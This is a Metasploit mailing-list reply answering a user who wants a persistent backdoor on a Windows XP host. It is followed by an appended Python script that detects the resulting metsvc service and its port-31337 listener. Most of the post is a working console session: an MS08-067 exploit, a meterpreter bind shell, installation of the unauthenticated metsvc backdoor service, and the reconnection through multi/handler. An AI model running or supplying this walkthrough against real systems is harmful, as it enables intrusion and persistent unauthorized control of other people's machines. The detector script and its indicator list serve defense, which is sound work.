Metasploit mailing list archives
Re: newbie backdoor issue
From: troy () defendit com au
Date: Fri, 22 Jan 2010 18:09:24 +1100 (EST)
Hi,

You could upload meterpreter and install as a service.

Example:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.9
RHOST => 192.168.0.9
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.3:36842 -> 192.168.0.9:4444)
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\iTImctYkkgUlqQ...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.
meterpreter>

To connect back to host later:

Background session 2? [y/N] y
msf exploit(ms08_067_netapi) > back
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 192.168.0.9
RHOST => 192.168.0.9
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started bind handler
[*] Meterpreter session 3 opened (192.168.0.3:49164 -> 192.168.0.9:31337)
meterpreter >
Background session 3? [y/N]
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  2   Meterpreter  192.168.0.3:41472 -> 192.168.0.9:4444
  3   Meterpreter  192.168.0.3:49164 -> 192.168.0.9:31337

Caution: the meterpreter listener doesn't require authentication; anybody who can access the meterpreter port (in this case 31337) could connect to the target and gain system privs.
sorry if it seems odd at first look but.. tested on target environment xp sp2 obtained shell..lol but issue is how to set a permanent & persistent backdoor so that I can connect to the same host when I wish to.. any suggestion or help appreciated

--
Happiness is like a Butterfly...

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
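For defenders, the session output in the message above leaves checkable artifacts: a service named metsvc, its three uploaded files, a binary running from a temp directory, and an unauthenticated listener on port 31337. The following is an added example, not part of the original post or of Metasploit; the function names, the service records and the netstat lines are constructed for illustration.

```python
import ntpath
import re

# Indicators taken from the session output quoted in the post.
METSVC_SERVICE = "metsvc"
METSVC_FILES = {"metsvc.exe", "metsvc-server.exe", "metsrv.dll"}
METSVC_PORT = 31337  # port shown in the post
TEMP_DIR = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
# One `netstat -ano` TCP row: proto, local addr, remote addr, state, PID.
LISTEN = re.compile(r"^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def audit_services(services):
    """Return (service name, reason) pairs for suspicious service records."""
    findings = []
    for svc in services:
        path = svc["image_path"].strip('"')
        if svc["name"].lower() == METSVC_SERVICE:
            findings.append((svc["name"], "service name matches metsvc"))
        if ntpath.basename(path).lower() in METSVC_FILES:
            findings.append((svc["name"], "known metsvc file name"))
        if TEMP_DIR.search(path):
            # General check: services rarely run from a temp directory.
            findings.append((svc["name"], "binary runs from a temp directory"))
    return findings


def audit_listeners(netstat_text, services):
    """Return (pid, owning service) for listeners on the metsvc port."""
    owners = {svc["pid"]: svc["name"] for svc in services}
    hits = []
    for line in netstat_text.splitlines():
        m = LISTEN.match(line)
        if m and int(m.group(1)) == METSVC_PORT:
            pid = int(m.group(2))
            hits.append((pid, owners.get(pid, "unknown")))
    return hits


# Constructed sample inventory (not real host data).
SAMPLE_SERVICES = [
    {"name": "Spooler", "pid": 1180,
     "image_path": r"C:\WINDOWS\system32\spoolsv.exe"},
    {"name": "metsvc", "pid": 2044,
     "image_path": r"C:\WINDOWS\TEMP\EXAMPLEDIR\metsvc.exe"},
]
SAMPLE_NETSTAT = """\
  TCP    0.0.0.0:135      0.0.0.0:0    LISTENING    912
  TCP    0.0.0.0:31337    0.0.0.0:0    LISTENING    2044
"""

if __name__ == "__main__":
    print(audit_services(SAMPLE_SERVICES))
    print(audit_listeners(SAMPLE_NETSTAT, SAMPLE_SERVICES))
```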